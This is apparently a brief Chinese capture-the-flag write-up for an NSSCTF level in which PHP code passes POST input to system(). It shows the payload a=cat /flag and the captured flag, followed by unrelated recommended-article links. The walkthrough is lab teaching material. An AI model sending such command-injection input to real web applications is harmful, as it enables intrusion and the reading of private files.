开启靶场,打开链接:
这关代码跟level 1的区别是eval(_POST\['a'\]);变成了system(_POST['a']);
system() 函数会通过软连接执行你输入的系统命令
POST传参:a=cat /flag
成功得到flag:
NSSCTF{b10b3661-b382-467e-86be-4c374fdd3e5f}
相关推荐
小屋主人1 小时前
【实用软件】UninstallTool:一个小巧、安全、快速、强大的卸载软件星轨初途2 小时前
数据结构排序算法详解(5)——非比较函数:计数排序(鸽巢原理)及排序算法复杂度和稳定性分析oh-pinpin2 小时前
安全配置类ヽ格式化3 小时前
一文读懂栈与堆:从生活例子到Golang/PHP内存管理实践骥龙4 小时前
4.12、隐私保护机器学习:联邦学习在安全数据协作中的应用c***97984 小时前
PHP在内容管理中的模板引擎Q_Q5110082855 小时前
python+django/flask的情绪宣泄系统用户7227868123445 小时前
PHP Fiber 优雅协作式多任务